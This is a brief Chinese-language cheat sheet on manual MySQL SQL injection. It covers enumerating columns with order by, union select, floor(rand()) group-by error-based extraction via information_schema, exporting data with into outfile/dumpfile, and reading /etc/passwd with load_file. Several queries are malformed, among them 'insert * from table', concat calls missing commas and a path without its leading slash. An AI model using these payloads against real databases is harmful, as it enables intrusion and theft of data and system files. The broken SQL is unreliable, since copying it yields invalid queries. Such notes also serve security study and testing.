mysql手工注入总结

mysql -u 用户名 -p 密码 -h IP地址
show databases; 查看数据库
select version();　　php注入的版本号
use database(表名）；
show tables; 显示这张表的表名
select * from table;
insert * from table;
create database 库名；创建数据库
create table 表名（字段名 VARCHAR(20),字段名 CHAR(1));
- 　create table pet{ name varchar(20), owner varchar(20)}
desc 表名；如：desc pet 查看表的信息
drop database 库名；删除库名
drop table 表名；删除数据表
delete from 表名；将表中记录清空
mysql中的information_schema，提供了访问数据元数据的方式，确切说是信息数据库。其中保存着关于MySQL的服务器所维护的所有其他数据库的信息。如数据库名、数据库的表等。常用的information_schema数据库表说明：
- SCHEMATA表--------------提供当前mysql实例中所有数据库信息
- TABLES表-----------------提供了关于数据库中的表的信息
- COLUMNS表---------------提供了表中的列信息。

通过（基于单引号错误、双引号错误、数字型、单引号变形、双引号变形）判断注入的类型；
order by 判断有多少列
union select ---(version(),user(),current_user)
select count(*) from information_schema.tables;
select rand();
select table_name,table_schema from information_schema.tables group by table_schema;
select database();
select concat((select database())); 将字符串连接在一起
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)
select concat(0x3a,0x3a,(select database()),0x3a,0x3a) a; 连接起来形成一个单一字符串，起个名字a
select concat(0x3a,0x3a(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns;
select concat(0x3a,0x3a(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables;

select count(*),concat(0x3a,0x3a(select database()),0x3a,0x3a, floor (rand()*2)) a from information_schema.tables group by a;将得到字符串分组

这样在几次尝试后，会得到一个错误信息，由于随机数字重复了，这里会爆出一些想要的信息
select * from users into outfile "/tmp/tests.txt" 导出
select * from users limit 0,1 into dumpfile "/tmp/test2.txt" dumpfile只能使用一行，所以下载数据库时候给个限制。
select load_file("/etc/passwd"); 将文件系统数据导入mysql中
select load_file("etc/passwd") into outfile "tmp/test4.txt";